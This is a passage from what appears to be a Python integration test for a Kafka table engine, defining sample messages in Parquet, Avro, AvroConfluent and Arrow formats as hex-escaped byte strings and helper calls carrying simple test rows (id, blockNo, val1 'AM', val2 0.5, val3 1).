\x63\x6b\x4e\x6f\x25\x18\x4c\xac\x13\x10\x12\x00\x00\x00\x15\x0c\x25\x00\x18\x04\x76\x61\x6c\x31\x25\x00\x4c\x1c\x00\x00\x00\x15\x08\x25\x00\x18\x04\x76\x61\x6c\x32\x00\x15\x02\x25\x00\x18\x04\x76\x61\x6c\x33\x25\x16\x4c\xac\x13\x08\x12\x00\x00\x00\x16\x1e\x19\x1c\x19\x5c\x26\xca\x02\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x1e\x16\x9e\x03\x16\xc2\x02\x26\xb8\x01\x26\x08\x1c\x18\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x26\xd8\x04\x1c\x15\x02\x19\x35\x04\x00\x06\
x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\x8c\x04\x26\xe4\x03\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x26\xb2\x06\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x1e\x16\x68\x16\x70\x26\xee\x05\x26\xc2\x05\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x26\x9a\x08\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x1e\x16\x84\x01\x16\x8c\x01\x26\xb6\x07\x26\x8e\x07\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x26\x8e\x0a\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\xc2\x09\x26\x9a\x09\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x16\xa6\x06\x16\x1e\x00\x28\x22\x70\x61\x72\x71\x75\x65\x74\x2d\x63\x70\x70\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x31\x2e\x35\x2e\x31\x2d\x53\x4e\x41\x50\x53\x48\x4f\x54\x19\x5c\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x00\xc5\x01\x00\x00\x50\x41\x52\x31',
b'\x50\x41\x52\x31\x15\x04\x15\x10\x15\x14\x4c\x15\x02\x15\x04\x12\x00\x00\x08\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x0c\x15\x10\x4c\x15\x02\x15\x04\x12\x00\x00\x06\x14\x02\x00\x00\x00\x41\x4d\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x03\x08\x01\x02\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\xb2\x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x3f\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x03\x08\x01\x02\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x01\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x15\x02\x19\x6c\x35\x00\x18\x06\x73\x63\x68\x65\x6d\x61\x15\x0a\x00\x15\x04\x25\x00\x18\x02\x69\x64\x00\x15\x02\x25\x00\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x25\x18\x4c\xac\x13\x10\x12\x00\x00\x00\x15\x0c\x25\x00\x18\x04\x76\x61\x6c\x31\x25\x00\x4c\x1c\x00\x00\x00\x15\x08\x25\x00\x18\x04\x76\x61\x6c\x32\x00\x15\x02\x25\x00\x18\x04\x76\x61\x6c\x33\x25\x16\x4c\xac\x13\x08\x12\x00\x00\x00\x16\x02\x19\x1c\x19\x5c\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\xb2\
x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x16\x98\x05\x16\x02\x00\x28\x22\x70\x61\x72\x71\x75\x65\x74\x2d\x63\x70\x70\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x31\x2e\x35\x2e\x31\x2d\x53\x4e\x41\x50\x53\x48\x4f\x54\x19\x5c\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x00\xc4\x01\x00\x00\x50\x41\x52\x31',
],
},
'AvroConfluent': {
'data_sample': [
avro_confluent_message(schema_registry_client,
{'id': 0, 'blockNo': 0, 'val1': str('AM'), 'val2': 0.5, "val3": 1}),
b''.join([avro_confluent_message(schema_registry_client,
{'id': id, 'blockNo': 0, 'val1': str('AM'),
'val2': 0.5, "val3": 1}) for id in range(1, 16)]),
avro_confluent_message(schema_registry_client,
{'id': 0, 'blockNo': 0, 'val1': str('AM'), 'val2': 0.5, "val3": 1}),
],
'extra_settings': ", format_avro_schema_registry_url='http://{}:{}'".format(
kafka_cluster.schema_registry_host,
8081
),
'supports_empty_value': True,
},
'Avro': {
# It seems impossible to send more than one Avro file per message
# because of the nature of Avro: blocks go one after another
'data_sample': [
avro_message({'id': 0, 'blockNo': 0, 'val1': str('AM'), 'val2': 0.5, "val3": 1}),
avro_message([{'id': id, 'blockNo': 0, 'val1': str('AM'),
'val2': 0.5, "val3": 1} for id in range(1, 16)]),
avro_message({'id': 0, 'blockNo': 0, 'val1': str('AM'), 'val2': 0.5, "val3": 1}),
],
'supports_empty_value': False,
},
'Arrow' : {
'data_sample' : [
b'\x41\x52\x52\x4f\x57\x31\x00\x00\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x10\x00\x00\x00\x0c\x00\x14\x00\x06\x00\x08\x00\x0c\x00\x10\x00\x0c\x00\x00\x00\x00\x00\x03\x00\x3c\x00\x00\x00\x28\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x58\x01\x00\x00\x00\x00\x00\x00\x60\x01\x00\x00\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\
x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\x78\x01\x00\x00\x41\x52\x52\x4f\x57\x31',
b'\x41\x52\x52\x4f\x57\x31\x00\x00\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x48\x01\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00\x06\x00\x00\x00\x08\x00\x00\x00\x0a\x00\x00\x00\x0c\x00\x00\x00\x0e\x00\x00\x00\x10\x00\x00\x00\x12\x00\x00\x00\
x14\x00\x00\x00\x16\x00\x00\x00\x18\x00\x00\x00\x1a\x00\x00\x00\x1c\x00\x00\x00\x1e\x00\x00\x00\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x00\xff\xff\xff\xff\x00\x00\x00\x00\x10\x00\x00\x00\x0c\x00\x14\x00\x06\x00\x08\x00\x0c\x00\x10\x00\x0c\x00\x00\x00\x00\x00\x03\x00\x3c\x00\x00\x00\x28\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x58\x01\x00\x00\x00\x00\x00\x00\x60\x01\x00\x00\x00\x00\x00\x00\x48\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\x78\x01\x00\x00\x41\x52\x52\x4f\x57\x31',
b'\x41\x52\x52\x4f\x57\x31\x00\x00\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x0